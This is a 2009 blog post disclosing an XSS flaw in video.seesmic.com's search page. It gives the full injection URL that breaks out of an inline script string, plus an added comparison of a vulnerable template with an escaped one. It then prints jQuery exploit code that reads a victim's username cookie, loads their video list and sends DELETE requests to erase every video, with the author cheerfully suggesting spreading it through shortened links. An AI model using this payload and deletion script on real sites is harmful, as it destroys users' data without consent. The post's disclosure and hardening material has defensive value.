
Jul 11 2009

XSS in video.seesmic.com search; Includes bonus feature

Normally when I see injection vectors it’s simply because unsanitized user input is echoed back to the user in some really obvious fashion. Those get old quickly.

The particular injection point I found was fun because Seesmic took the time to urlencode the search terms before showing them to the user, but then later on in the page uses that same input inside a small chunk of inline JavaScript. What’s awesome about that is that we don’t have to include script tags: our input is already in a script context, so it just gets run automatically. More fun than Saturday morning cartoons.

Here is the injection vector. It requires that the victim have a valid Seesmic session open, but just think if somebody posted a video linking to a tinyurl of this and this fun little JavaScript turned all of the user’s private videos public.

http://video.seesmic.com/search?q='%2C%20videoSearchCount%3A0%2CpeopleSearchCount%3A0%7D%3Balert('xss')%3Btest%20%3D%20%7Ba%3A'
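The bug class is a context mismatch: the search term is encoded for the HTML body but pasted raw into an inline-script object literal, where a single quote ends the string and everything after it is parsed as code. Below is an added illustration with two hypothetical server-side template functions (not Seesmic’s code) rendered on the same constructed input, the vulnerable one beside a version that serializes the value for a JavaScript context.

```javascript
// Vulnerable pattern: the raw query is concatenated into a JS string literal inside an
// inline <script>. HTML/URL encoding done elsewhere on the page does not help here.
function renderSearchScriptVulnerable(q) {
  return "var searchState = {q: '" + q + "', videoSearchCount: 0, peopleSearchCount: 0};";
}

// Serialize a value for a JavaScript context. JSON.stringify escapes quotes, backslashes
// and control characters; we additionally escape <, > and the U+2028/2029 line
// terminators so the literal can never close the <script> tag or break the parse.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Hardened pattern: the query is emitted through the JS-context serializer, so the
// object literal always receives exactly one string value.
function renderSearchScriptSafe(q) {
  return "var searchState = {q: " + jsStringLiteral(q) + ", videoSearchCount: 0, peopleSearchCount: 0};";
}

// Evaluate a generated script in an isolated Function scope and record any alert()
// calls it makes, so both templates can be compared on identical input.
function runScript(script) {
  var calls = [];
  var state = new Function("alert", script + "\nreturn searchState;")(function (m) {
    calls.push(m);
  });
  return { q: state.q, calls: calls };
}

// Constructed input shaped like the post's payload: it closes the string and the object,
// runs a statement, then re-opens an object so the rest of the template still parses.
var BREAKOUT = "', x: 0}; alert('probe'); var test = {a: '";
```

With the vulnerable template `runScript` records one `alert` call and `searchState.q` is empty; with the hardened template no call is made and `searchState.q` round-trips to the original input.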

So who really cares if there is an XSS in video.seesmic.com? I thought about it for a while and came up with one particular exploit that would impact a few Seesmic users. How about deleting all of a user’s videos if they visit a magical link? Here are the details. (I also thought a variant that would make all private videos public would have been fun, but I just don’t have the time.)

1. A user with a valid session clicks on a nice tiny url. (Just think of how many people would click on this in a description for a video in the public stream!)
2. The username is parsed from the site cookies.
3. The user’s video JSON feed is loaded up.
4. For each video gathered in step 3, delete the video.

So how about some code? I left out at least one of the utility functions, so you have to at least know somewhat what is going on to make it work.

// Delete a single video by id with a DELETE request to the site's JSON API.
// The request is authenticated by the victim's existing session cookie alone.
function deletevideo(id) {
    jQuery(document).ready(function() {
        jQuery.ajax({
            type: "DELETE",
            url: "/videos/" + id + ".json",
            data: "preventCache=1234567890"
        });
    });
}

// readCookie is the utility function deliberately left out of this post.
username = readCookie("username");

// Load the user's own video feed and delete every video it lists.
jQuery.getJSON("/users/" + username + "/videos.json",
    function(data) {
        for (var i in data) {
            deletevideo(data[i].thread_id);
        }
    });
